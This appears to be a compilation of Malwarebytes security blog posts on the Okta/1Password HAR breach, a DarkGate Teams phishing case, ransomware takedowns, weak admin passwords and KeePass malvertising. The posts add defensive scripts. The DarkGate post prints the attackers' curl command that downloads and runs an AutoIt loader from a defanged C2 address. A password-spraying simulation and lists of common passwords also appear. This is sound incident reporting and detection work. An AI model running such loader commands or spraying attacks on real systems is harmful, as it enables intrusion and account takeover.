IT NEWS

1Password reports security incident after breach at Okta

Password manager 1Password says it’s been affected by a breach at Okta, but it reports no user data has been stolen.

In a security incident report, 1Password says that a member of its IT team received an unexpected email suggesting they had initiated an Okta report listing administrative users. They hadn’t requested it, so they reported the email to the security department.

An internal investigation showed unsolicited activity in the Okta environment which was traced to a suspicious IP address. Later it was confirmed that an attacker had accessed 1Password’s Okta environment using administrative privileges. 1Password says it took action straight away:

“We immediately terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.”

Okta breach

On Friday, Okta said it spotted an attacker using a stolen credential to access Okta’s support case management system. This allowed them to view files uploaded by certain Okta customers as part of recent support cases.

It’s normal for Okta support to ask customers to upload an HTTP Archive (HAR) file, which lets the support team troubleshoot issues by replaying what the browser did. Because a HAR file records complete requests and responses, it can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.

A member of 1Password’s IT team was engaged with Okta support, and at their request, created and uploaded such a HAR file to the Okta Support Portal.

In the early morning hours of Friday, September 29, 2023, an unknown actor used the same Okta session that was used to create the HAR file to access the Okta administrative portal.
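One practical check before uploading a HAR file to any support portal is to strip the session-bearing material out of it first. The script below is an added example, not code from 1Password, Okta or the original post; the HAR it scrubs is a constructed sample shaped like a browser’s HAR export, and the hostname example.okta.com and the token values in it are placeholders.

```python
import copy
import json

REDACTED = "[REDACTED]"

# Header names whose values can be replayed to take over a session or API access.
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "proxy-authorization"}

# Constructed sample HAR: one request to an admin API carrying a session cookie and a
# bearer token, and a response that sets a cookie and returns a token in its JSON body.
SAMPLE_HAR = {
    "log": {
        "version": "1.2",
        "entries": [
            {
                "request": {
                    "method": "GET",
                    "url": "https://example.okta.com/api/v1/users",
                    "headers": [
                        {"name": "Cookie", "value": "sid=102abc...; JSESSIONID=9f3e..."},
                        {"name": "Authorization", "value": "Bearer eyJhbGciOi..."},
                        {"name": "Accept", "value": "application/json"},
                    ],
                    "cookies": [{"name": "sid", "value": "102abc..."}],
                },
                "response": {
                    "status": 200,
                    "headers": [
                        {"name": "Set-Cookie", "value": "sid=102abc...; Secure; HttpOnly"},
                        {"name": "Content-Type", "value": "application/json"},
                    ],
                    "cookies": [{"name": "sid", "value": "102abc..."}],
                    "content": {"mimeType": "application/json",
                                "text": "{\"sessionToken\":\"20111abc...\"}"},
                },
            }
        ],
    }
}


def scrub_har(har, drop_bodies=True):
    """Return (scrubbed copy, number of values redacted); the input is left untouched.

    Redacts session-bearing headers and every cookie value on both request and response
    and, by default, request/response bodies, because login and token endpoints return
    session material in JSON as well.
    """
    har = copy.deepcopy(har)
    redacted = 0
    for entry in har.get("log", {}).get("entries", []):
        for side in ("request", "response"):
            msg = entry.get(side, {})
            for header in msg.get("headers", []):
                if header.get("name", "").lower() in SENSITIVE_HEADERS:
                    header["value"] = REDACTED
                    redacted += 1
            for cookie in msg.get("cookies", []):
                if cookie.get("value"):
                    cookie["value"] = REDACTED
                    redacted += 1
            if drop_bodies:
                body = msg.get("postData") if side == "request" else msg.get("content")
                if body and body.get("text"):
                    body["text"] = REDACTED
                    redacted += 1
    return har, redacted


def remaining_secrets(har):
    """Count sensitive headers and cookies that still carry a live value; 0 means clean."""
    left = 0
    for entry in har.get("log", {}).get("entries", []):
        for side in ("request", "response"):
            msg = entry.get(side, {})
            left += sum(1 for h in msg.get("headers", [])
                        if h.get("name", "").lower() in SENSITIVE_HEADERS and h.get("value") != REDACTED)
            left += sum(1 for c in msg.get("cookies", [])
                        if c.get("value") and c.get("value") != REDACTED)
    return left


if __name__ == "__main__":
    import sys
    source = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_HAR
    clean, count = scrub_har(source)
    json.dump(clean, sys.stdout, indent=1)
    print(f"\n# redacted {count} values, {remaining_secrets(clean)} left", file=sys.stderr)
```

Run it as `python scrub_har.py capture.har > capture.clean.har` and read what remains before attaching the result to a ticket. Scrubbing the file does not change the fact that the session captured during the recording was live: the safer habit, given what happened here, is to sign out and revoke the session used for the capture once the support case is closed.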

If the 1Password incident is a consequence of the same Okta breach, it puts the timeline of the Okta breach, which BeyondTrust discovered on October 2, 2023, in a new light. BeyondTrust says it had to persist with escalations within Okta until October 19, when Okta security leadership notified BeyondTrust that Okta had indeed experienced a breach and that BeyondTrust was one of the affected customers.

Okta says it has now notified all impacted customers.

“All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.”

1Password suspects that the attackers were merely looking for information that would allow them to attack on a larger scale. They tried, for example, to access the IT team member’s user dashboard, but that attempt was blocked by Okta. They also requested a report of administrative users, which was the action that triggered the investigation.

A thorough investigation of the circumstances, and of the device that was used to upload the HAR file, did not reveal any other way the information could have been captured. It did reveal which vendor 1Password relies on in a crisis, though:

“The IT team member’s macOS laptop that was used is currently offline, and was scanned with the free version of Malwarebytes, which reported no findings.”

It wasn’t until after Okta revealed it’d had a security incident, that 1Password realized that the information was stolen during that incident.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop, or phone as your second factor. Some forms of 2FA, such as codes sent by SMS or generated by an app, can be phished just as easily as a password. A FIDO2 credential is bound to the site’s origin, so a lookalike site cannot capture it.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap, reduces your risk of unknown threats, and increases your security efficiency exponentially. Malwarebytes MDR staffs highly experienced Tier 2 and Tier 3 analysts who are hands-on with customer endpoints, ensuring critical threats are quickly identified and a thorough response is rapidly deployed.

Want to learn more about MDR? Get a free trial below.

TRY NOW

Google Chrome wants to hide your IP address

Google is working out some kinks in the project formerly known as Gnatcatcher, now known under the more descriptive name “IP Protection.” With it, Chrome is reintroducing a proposal to hide users’ IP addresses in order to make cross-site tracking more difficult.

An Internet Protocol (IP) address is a unique number that’s assigned to your computer when it joins a network. The number acts as your address on the network. In order for two computers to communicate, each must know the other’s address, so that messages go to the right place.

The IP address you use on the Internet is typically the one that your ISP (Internet Service Provider) gives your router. Although that IP address isn’t assigned to you permanently, it will likely go unchanged until you disconnect or turn off your router. Blocks of IP addresses are assigned geographically, so it’s also possible to use them for a form of crude geolocation, accurate to about the nearest city.

Your IP address’s combination of persistence and uniqueness makes it a useful identifier for anyone who wants to track you across multiple websites. It can also be combined with other semi-permanent information from your browser to create an even more accurate “fingerprint”, that identifies you when you browse.

Over time this fingerprint can be used to build up a unique, persistent user profile that can be used for targeted advertising, which many people see as a threat to their privacy.

As a result, some users do not like to reveal their IP address, so they hide it using a proxy server or a VPN. Both proxies and VPNs mask a user’s IP address with one of their own. Only the proxy operator or VPN provider knows the user’s real address.

Google’s IP Protection proposal will use proxies to hide users’ IP addresses.

Because there are some potentially unwanted side-effects, and Google wants to learn as it goes, the feature will be tested and rolled out in multiple phases. In the first phase the feature will use a single Google-owned proxy, will only proxy requests to domains owned by Google, and will only work for users with US-based IP addresses.

Apparently Google wants to test the infrastructure without impacting third-party companies. Domains owned by Google include services like Gmail, but also AdServices. Note that in this phase Google will automatically enroll a small percentage of users, and they must be logged in to Chrome.

In later phases Google plans to use a chain of two proxies so that neither proxy can see both the origin and the destination IP address. There are some concerns that will need to be ironed out in the course of the testing phases:

  • Defensibility, since a compromised proxy may be used to deploy attacks.
  • Disruption of existing Denial of Service (DoS) defenses by using the two proxies.
  • Disruption of existing defenses for fraud and invalid traffic detection. For example, depending on the way they work, some IP-based block-lists will no longer be effective because the destination site only sees the proxy’s address, not the client’s.

Google expects that these findings may change its plans along the way, and states:

“Long term solutions will evolve and will be shaped in conjunction with the ecosystem. We will collaborate with ISPs, CDNs, third parties, and destination sites towards the end-state of privacy proxies for the web. For instance, ISPs and CDNs are well suited to operate privacy proxies.”

We will keep an eye on how this development takes shape. But even if I could, I would not sign up for the first phase if I were a user who currently uses a VPN to hide their IP address, because in this phase Google will be able to see both your IP address and the one you are visiting, which means you would only be shifting the information gathering from several Google services to one central point.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

A week in security (October 16 – October 22)

Battling a new DarkGate malware campaign with Malwarebytes MDR

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Truesec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

The Initial Incident

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named “C_onfidential Sign_ificant Company Changes.zip” (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included “EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK” and “COMPANY_TRANSFORMATIONS.PDF.LNK“.

The Malicious Command

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a ‘Known bad’ destination and blocked it.


Multiple attempts to execute processes such as curl commands

DarkGate Loader – The Culprit

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known campaign that uses Teams phishing to install DarkGate Loader. The curl command fetches the malicious files and drops them onto the victim’s machine (IP address defanged):

    "C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\[Redacted]\AppData\Local\Temp\Autoit3.exe" "http://5[.]188[.]87[.]58:2351" -o "C:\Users\[Redacted]\AppData\Local\Temp\btbgvbyy.au3" "http://5[.]188[.]87[.]58:2351/msibtbgvbyy" "C:\Users\[Redacted]\AppData\Local\Temp\Autoit3.exe" "C:\Users\[Redacted]\AppData\Local\Temp\btbgvbyy.au3" & exit

The command drops a legitimate AutoIt interpreter (Autoit3.exe) next to a malicious AutoIt script (btbgvbyy.au3) and runs the script with it. Director of Threat Intelligence Jerome Segura notes that the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.
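Two of the tells in this chain are easy to check for mechanically: an archive whose members carry a document extension in front of an executable one (here .PDF.LNK), and a process command line in which curl writes files into %TEMP% and AutoIt3.exe then runs a .au3 script from there. The script below is an added example, not Malwarebytes’ detection logic or code from the post. The ZIP it inspects is a constructed stand-in whose members carry only a shortcut header, the command line is the one printed above with backslashes restored and the user profile replaced by the placeholder victim, and the extension lists are assumptions a team would tune.

```python
import io
import re
import zipfile

# Header every Windows .lnk file starts with: HeaderSize 0x4C followed by the
# LinkCLSID {00021401-0000-0000-C000-000000000046} in little-endian GUID form.
LNK_MAGIC = b"\x4c\x00\x00\x00" + b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"

# Extensions that execute on double-click, and the "document" extensions lures hide them behind.
EXEC_EXT = {".lnk", ".exe", ".scr", ".js", ".vbs", ".hta", ".cmd", ".bat"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}


def build_sample_zip():
    """Constructed stand-in for the lure archive: two fake PDFs that are really shortcuts, one harmless file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK", LNK_MAGIC + b"\x00" * 60)
        zf.writestr("COMPANY_TRANSFORMATIONS.PDF.LNK", LNK_MAGIC + b"\x00" * 60)
        zf.writestr("notes.txt", b"nothing to see here")
    return buf.getvalue()


def suspicious_members(zip_bytes):
    """Return [(name, reasons)] for members with a doc.exec double extension or a real LNK header."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reasons = []
            parts = info.filename.lower().rsplit(".", 2)
            if len(parts) == 3 and "." + parts[2] in EXEC_EXT and "." + parts[1] in DOC_EXT:
                reasons.append("double extension " + ".".join(parts[1:]))
            with zf.open(info) as fh:
                if fh.read(len(LNK_MAGIC)) == LNK_MAGIC:
                    reasons.append("LNK header")
            if reasons:
                hits.append((info.filename, reasons))
    return hits


# Process-creation command line from this incident, backslashes restored and the
# defanged IP left as printed; "victim" stands in for the redacted profile name.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /k curl -# -o '
    r'"C:\Users\victim\AppData\Local\Temp\Autoit3.exe" "http://5[.]188[.]87[.]58:2351" '
    r'-o "C:\Users\victim\AppData\Local\Temp\btbgvbyy.au3" '
    r'"http://5[.]188[.]87[.]58:2351/msibtbgvbyy" '
    r'"C:\Users\victim\AppData\Local\Temp\Autoit3.exe" '
    r'"C:\Users\victim\AppData\Local\Temp\btbgvbyy.au3" & exit'
)

# curl told to write an executable or AutoIt script somewhere under a \Temp\ directory.
CURL_TO_TEMP = re.compile(r'\bcurl\b.*?\s-o\s+"?[^"\s]*\\temp\\[^"\s]*\.(?:exe|au3|dll)\b', re.I)
# An AutoIt interpreter living in \Temp\ being handed a .au3 script.
AUTOIT_FROM_TEMP = re.compile(r'\\temp\\autoit3\.exe"?\s+"?[^"\s]*\.au3\b', re.I)


def classify_cmdline(cmdline):
    """Return the DarkGate-style behaviours present in a process command line (empty if none)."""
    findings = []
    if CURL_TO_TEMP.search(cmdline):
        findings.append("curl writes payload into %TEMP%")
    if AUTOIT_FROM_TEMP.search(cmdline):
        findings.append("AutoIt3.exe runs .au3 script from %TEMP%")
    return findings


if __name__ == "__main__":
    for name, reasons in suspicious_members(build_sample_zip()):
        print(f"{name}: {', '.join(reasons)}")
    print(classify_cmdline(SAMPLE_CMDLINE))
```

The archive check is the one to put in front of the Teams or mail gateway; the command-line check belongs in the EDR or SIEM, keyed on process-creation events, and fires before any network block-list has to, which matters on the day the IP changes.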


Malwarebytes EDR recognizing suspicious AutoIt activity


Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

Actions Taken

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

Lessons from the Incident

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

Indicators of Compromise (IoC)

File Details:

Filename: C_onfidential Sign_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

Network Indicators:

C2 IP Address: 5[.]188[.]87[.]58

Malicious URLs:

http://5[.]188[.]87[.]58:2351

http://5[.]188[.]87[.]58:2351/msibtbgvbyy

MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22

This week on the Lock and Code podcast…

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media… but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company’s flagship hotel complex near the southern end of the Las Vegas strip—that didn’t involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn’t just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn’t stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator’s handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesars Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company’s budget—and its relative ability to devote resources to cybersecurity—doesn’t necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he’s seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

“How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?”

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Ragnar Locker ransomware group taken down

Even though it had a long run for a ransomware group, it seems the bell might be tolling for Ragnar Locker. On October 19, 2023, the group’s leak site was seized by an international group of law enforcement agencies.

seizure notice on Ragnar Locker's leak site

The take down action was carried out between 16 and 20 October. During the action searches were conducted in Czechia, Spain and Latvia. The main target, suspected of being a developer of the Ragnar group, has been brought in front of the examining magistrates of the Paris Judicial Court.

The action was coordinated at international level by Europol and Eurojust. The ransomware group’s infrastructure was also seized in the Netherlands, Germany and Sweden and the associated data leak website was taken down in Sweden.

Ragnar Locker started its operations at the end of 2019, making it unusually long lived. Most ransomware groups do not survive that long, mostly due to internal struggles or a takedown such as this one.

Based on known attacks, as shown in our monthly ransomware reviews, Ragnar Locker was number 15 on the list of the most active ransomware groups over the last twelve months. (A known attack is one where a victim’s details are posted on a ransomware group’s leak website because they didn’t pay a ransom. The number of known attacks probably represents 50%-75% of the total attacks.)

Graph showing known attacks by Ragnar Locker over the last year
Known attacks by Ragnar Locker, October 2022 – September 2023

Ragnar Locker has been called out for specifically targeting the energy sector, after attacks on Energias de Portugal (EDP) and Greek gas operator DESFA, but at Malwarebytes we never noticed any specialization. In the chart below, you can see that across 36 known attacks in the last 12 months it hit 15 different sectors.

known attacks by Ragnar Locker by vertical

Ragnar Locker’s known attacks by industry sector, October 2022 – September 2023

In 2022, the FBI published a flash alert to warn that the Ragnar Locker ransomware gang had breached the networks of at least 52 organizations across 10 critical infrastructure sectors.

One of the biggest upsets occurred when Ragnar Locker published information it had stolen from police computers in Zwijndrecht, a municipality in the province of Antwerp, Belgium. The stolen information included police records about license plates, speeding tickets, and at least one case of child abuse. Other high-profile victims include Campari and Capcom.

Ragnar Locker was not a Ransomware-as-a-Service (RaaS) operation that constantly advertised for new affiliates, so we assume it worked with a fairly constant group of people. It also seemed capable of developing new attack methods, like the ESXi encryptor that was recently deployed by the Dark Angels group in an attack on industrial giant Johnson Controls.

Ragnar Locker specifically targeted software commonly used by managed service providers (MSPs) to prevent its attacks from being detected and stopped. It also used the double extortion method of encryption plus data theft pretty much from the start.

The questionable honor of being the last victim posted on the leak site went to IP international presence, on October 6, 2023. There is always the chance that some victims are now left without an option to negotiate with the ransomware group.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The hot topics from Europe’s largest trade fair for IT security

IT-SA Expo & Congress claims to be Europe’s largest trade fair for IT security. And it really covers a wide range of security and security-related products and services. The event takes place in Nuremberg, Germany and provides an opportunity for vendors to show themselves to the public, create new contacts and leads, and check out what the competition is up to.

As one of the Malwarebytes representatives, I had the opportunity to walk around, talk to people, and listen to some of the talks given by representatives from throughout the industry.

All in all, I observed a lot of talks, and of the ones I heard that weren’t about promoting a product, most roughly fell into three categories: ransomware, AI/ChatGPT, and NIS2.

Ransomware

Ransomware is still considered the most alarming cybersecurity threat to businesses, which isn’t surprising given that Germany is regularly in the top five most targeted countries in our monthly ransomware reviews, which often makes it the first country on the list where English is not the primary language. As one of Europe’s leading economies there is some serious money to be made by the cybercriminals.

The focus in ransomware developments is the shift in attention to the earlier stages of the attacks. By the time files are being encrypted, attackers have probably already been in situ for a while, moving laterally through the victim’s network and stealing their data. Some ransomware gangs even stop there and don’t proceed to encryption anymore. Encryption routines are easy to detect and stop, but spotting the suspicious behavior that precedes them turns out to be much harder.

AI and ChatGPT

AI, and ChatGPT in particular, are very much at the forefront of everyone’s attention. Mostly because we are curious, maybe even a bit anxious, to see what the future will bring.

As distinguished researcher Mikko Hyppönen explained, it’s not the tool we should be worried about, but the intentions of its users. Yes, artificial intelligence can find zero-days. Is that great, because we can use it to find vulnerabilities that need patching, or is it awful, because it will allow cybercriminals to find vulnerabilities and exploit them?

Mikko slide about AI pros and cons

Another researcher told us that after the introduction of ChatGPT and its peers, they noticed a 27% increase in the linguistic complexity of phishing emails. The days when we could spot the phisher by counting the typos might be behind us. LLMs allow phishers to create long, error-free emails that first gain the trust of the target and then get them to open an attachment or click a link.

NIS2

The NIS2 Directive is EU-wide legislation on cybersecurity. Its purpose is to heighten the security levels for critical infrastructure in the European Union.

Businesses identified by the member states as operators of essential services in sectors such as energy, transport, water, banking, financial market infrastructures, healthcare, and digital infrastructure, will have to take appropriate security measures and notify relevant national authorities of serious incidents. Key digital service providers, such as search engines, cloud computing services, and online marketplaces, will have to comply with the security and notification requirements under the directive.

NIS2 has to be turned into laws by EU member states, which means it can be incorporated differently in every member state to functionally harmonize with local legislation. In Germany the third draft bill was presented in September 2023. So, while it’s slowly shaping up there is nothing definite about what will be included in the final draft.

A few things have been in all three drafts and seem likely to survive the cut. As a result, there was a lot of speculation, but nobody exactly knows what is going to happen. The NIS Implementation Act is scheduled to be announced in March 2024 and then come into force in October 2024 if everything goes as planned.

To anyone who I had the pleasure of meeting at IT-SA, I hope you had a successful event and let’s meet again some time.



IT administrators’ passwords are awful too

The key is under the doormat by the front door.

The administrator password is “admin”.

These are easy to remember clues when you are providing entrance to someone you trust. The problem is that they are also enormously easy to guess. It’s where we would expect an unwanted visitor to check first, before breaking out the toolbox.

Random end users could be forgiven for relying on such obviously insecure habits, but what about professionals whose job it is to keep things safe and secure? Research has revealed that IT administrators are just as likely as end users to do the tech equivalent of putting the key under the mat, with both groups using similarly predictable passwords.

The top 10 passwords assembled by the researchers looks like this:

    1. Admin
    2. 123456
    3. 12345678
    4. 1234
    5. Password
    6. 123
    7. 12345
    8. admin123
    9. 123456789
    10. adminisp

The first 10 entries in a password dictionary we found online:

    1. 123456
    2. Password
    3. 12345678
    4. Qwerty
    5. 12345
    6. 123456789
    7. Letmein
    8. 1234567
    9. Football
    10. iloveyou

Part of the popularity of passwords like admin, password, and 12345 might lie in the fact that they are often used as defaults: the ones set during an initial setup that are supposed to be changed afterwards. Default passwords, even if they are more complex, have the huge disadvantage that they can be found by simply looking up the product documentation in a search engine.

For that reason, using default passwords is considered a serious security risk. There are three different types of password attack that will discover passwords like admin or 12345 almost immediately:

  • Password spraying tries a short list of the most common passwords against as many accounts as possible, a few guesses per account so that no lockout is triggered.
  • Credential stuffing exploits reused passwords by trying username and password pairs leaked from breached websites.
  • Dictionary attacks try every entry in a list of common words and passwords against an account.

Do you see the resemblance? Combined with a little knowledge about the required password length, an attacker is going to have a field day. They wouldn’t even need a program to try these options; it can easily be done by hand.
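The distinction between the three attacks matters for defenders because per-account lockout, the control most directories ship with, only stops one of them. The simulation below is an added example and not part of the original post: a toy login service with a five-failure lockout, a constructed directory of five admin accounts (three of them using entries from the researchers’ top-10 list quoted above), and two attackers, one hammering a single account and one spraying.

```python
# The researchers' top-10 list quoted above, used as the attacker's wordlist.
TOP_PASSWORDS = ["Admin", "123456", "12345678", "1234", "Password",
                 "123", "12345", "admin123", "123456789", "adminisp"]

# Constructed admin directory; three of the five accounts use a top-10 password.
USERS = {
    "alice": "Correct-Horse-Battery-9",
    "bob": "admin123",
    "carol": "Password",
    "dave": "Tr0ub4dor&3",
    "erin": "12345678",
}


class AuthService:
    """Toy login endpoint with the usual per-account lockout: `lockout_threshold`
    failures inside one observation window lock the account for good.
    advance_window() models the window expiring and the counters resetting."""

    def __init__(self, users, lockout_threshold=5):
        self.users = users
        self.threshold = lockout_threshold
        self.failures = {u: 0 for u in users}
        self.locked = set()

    def login(self, user, password):
        if user in self.locked or user not in self.users:
            return False
        if self.users[user] == password:
            self.failures[user] = 0
            return True
        self.failures[user] += 1
        if self.failures[user] >= self.threshold:
            self.locked.add(user)
        return False

    def advance_window(self):
        self.failures = {u: 0 for u in self.users}


def dictionary_attack(svc, user, wordlist):
    """Try every candidate against one account. Trips the lockout after `threshold` misses,
    so a weak password that sits further down the list is never reached."""
    for pw in wordlist:
        if svc.login(user, pw):
            return pw
    return None


def password_spray(svc, users, wordlist):
    """Try a handful of candidates against every account, then wait for the lockout
    window to reset. No per-account counter ever reaches the threshold, nothing locks,
    and every account using a listed password falls."""
    found = {}
    per_window = svc.threshold - 1
    for i in range(0, len(wordlist), per_window):
        for pw in wordlist[i:i + per_window]:
            for user in users:
                if user not in found and svc.login(user, pw):
                    found[user] = pw
        svc.advance_window()
    return found


if __name__ == "__main__":
    single = AuthService(USERS)
    print("dictionary attack on bob:", dictionary_attack(single, "bob", TOP_PASSWORDS), "locked:", single.locked)
    spray = AuthService(USERS)
    print("spray:", password_spray(spray, list(USERS), TOP_PASSWORDS), "locked:", spray.locked)
```

The lockout does its job against the single-account attacker and does nothing against the sprayer, which is why detection has to count failures per source and across the whole directory rather than per account, and why the real fix is the one the rest of this post argues for: a denylist that rejects these passwords at set time, plus MFA on every administrative login.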

There is one glimmer of hope remaining after we read this. We hope that IT administrators know that passwords alone are not secure enough for important assets and will have added an extra layer of security in the form of multi-factor authentication (MFA).

As I wrote before, and will probably repeat in the future, multi-factor authentication is so much more secure, and with that a lot more forgiving, than passwords alone. I would not recommend it, but writing down your password on a Post-It and pasting it on your monitor won’t do an attacker any good if you have set up your MFA properly. Also not recommended, but you could even re-use your weak password on every site, as long as all those accounts were protected with the most effective form of MFA.

So, dear IT administrators, we can only hope that MFA is your defense strategy. But you should realize that by making your passwords so easy to guess, it doesn’t really deserve to be categorized as “multi” factor authentication, because you are giving the first factor away.

Your access rights are something that any cybercriminal would love to take over. Think of what they might be able to do, by being able to log in as you, so don’t give them that chance. Don’t be the weak link. While end users sometimes complain about the hassle of using a password manager, they shouldn’t really be a problem for you. Be a shining example.



Clever malvertising attack uses Punycode to look like KeePass’s official website

Threat actors are known for impersonating popular brands in order to trick users. In a recent malvertising campaign, we observed a malicious Google ad for KeePass, the open-source password manager, which was extremely deceptive. We previously reported on how brand impersonations are a common occurrence these days due to a feature known as tracking templates, but this attack used an additional layer of deception.

The malicious actors registered a copycat internationalized domain name that uses Punycode, a special character encoding, to masquerade as the real KeePass site. The difference between the two domains is visually so subtle that it will undoubtedly fool many people.

We have reported this incident to Google but would like to warn users that the ad is still currently running.

Malicious ad for KeePass

The malicious advert shows up when you perform a Google search for ‘keepass’, the popular open-source password manager. The ad is extremely deceptive, as it features the official KeePass logo and URL and is placed before the organic search result for the legitimate website.

By simply looking at the ad, you would have no idea that it is malicious. 


Figure 1: Malicious ad for KeePass followed by legitimate organic search result

People who click on the ad are redirected via a cloaking service that is meant to filter out sandboxes, bots, and anyone not deemed to be a genuine victim. The threat actors have set up a temporary domain at keepasstacking[.]site that performs the conditional redirect to the final destination:


Figure 2: Network traffic showing the sequence of redirects upon clicking the ad

ķeepass.info

Looking at the network traffic log above, we can see that the destination site uses Punycode, a special encoding that represents Unicode characters in ASCII so they can be used in domain names. The deception is complete even for users who try to verify that they are on the right website.


